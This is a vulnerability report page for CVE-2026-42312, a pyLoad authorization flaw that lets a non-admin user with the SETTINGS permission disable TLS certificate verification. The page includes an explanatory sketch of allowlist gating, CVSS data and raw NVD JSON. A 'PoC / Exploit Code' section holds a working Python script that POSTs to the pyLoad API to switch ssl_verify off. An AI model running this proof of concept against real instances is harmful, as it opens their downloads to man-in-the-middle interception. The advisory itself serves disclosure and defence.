Security Vulnerability Report
CVE-2026-42312 CVSS 6.8 MEDIUM

CVE-2026-42312

Published: 2026-05-11 18:16:35
Last Modified: 2026-05-11 20:25:42

Description

pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option ("general", "ssl_verify") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100.
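The failure mode described above, as an added sketch that is not pyLoad's code: a hand-maintained list of admin-only options (modelled on ADMIN_ONLY_CORE_OPTIONS) lets through every option it forgets, while an explicit list of options a SETTINGS user may change fails closed. Every option name except ("general", "ssl_verify"), and all helper names, are constructed for illustration.

```python
# Simplified model of the authorization gate; NOT pyLoad's implementation.
# Every option name except ("general", "ssl_verify") is constructed.

# Options that require admin. Anything missing from this set is writable
# by any user who holds the non-admin SETTINGS permission.
ADMIN_ONLY_CORE_OPTIONS = {
    ("example", "admin_option_a"),
    ("example", "admin_option_b"),
}

# Fail-closed alternative (hypothetical): options a non-admin SETTINGS user
# may change. Anything missing from this set requires admin.
USER_SETTABLE_CORE_OPTIONS = {
    ("example", "language"),
    ("example", "max_downloads"),
}

# Constructed stand-in for the full configuration schema.
ALL_CORE_OPTIONS = (
    ADMIN_ONLY_CORE_OPTIONS
    | USER_SETTABLE_CORE_OPTIONS
    | {("general", "ssl_verify")}
)


def may_set_admin_only_list(option, is_admin):
    """Gate that refuses only the options someone remembered to list."""
    return is_admin or option not in ADMIN_ONLY_CORE_OPTIONS


def may_set_user_safe_list(option, is_admin):
    """Gate that refuses everything not explicitly marked user-safe."""
    return is_admin or option in USER_SETTABLE_CORE_OPTIONS


def ungated_options(all_options):
    """Options a non-admin can write under the first gate but not the second.

    Run over the whole schema (for example in a unit test), this lists every
    option nobody has classified yet instead of finding them one CVE at a time.
    """
    return sorted(
        opt for opt in all_options
        if may_set_admin_only_list(opt, False)
        and not may_set_user_safe_list(opt, False)
    )


if __name__ == "__main__":
    print("unclassified options:", ungated_options(ALL_CORE_OPTIONS))
```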

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

pyLoad < 0.5.0b3.dev100

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (change this to the actual pyLoad instance)
TARGET_URL = "http://localhost:8000"
API_PATH = "/api/set_config_value"

# Attacker's credentials (low-privileged user with SETTINGS permission)
SESSION_COOKIE = "session=low_priv_user_session_token"

# The vulnerable configuration option
PAYLOAD = {
    "category": "general",
    "key": "ssl_verify",
    "value": "off",
}

headers = {
    "Cookie": SESSION_COOKIE,
    "Content-Type": "application/json",
}

try:
    # Send the request to disable SSL verification
    response = requests.post(f"{TARGET_URL}{API_PATH}", json=PAYLOAD, headers=headers)
    if response.status_code == 200:
        print("[+] Successfully disabled SSL verification!")
        print("[+] Future requests will be vulnerable to MITM attacks.")
    else:
        print(f"[-] Failed to exploit. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] Error: {e}")
```

References

https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-42312", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:34.833", "lastModified": "2026-05-11T20:25:42.430", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option (\"general\", \"ssl_verify\") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. This vulnerability is fixed in 0.5.0b3.dev100."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}, {"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9", "source": "[email protected]"}, {"url": "https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
```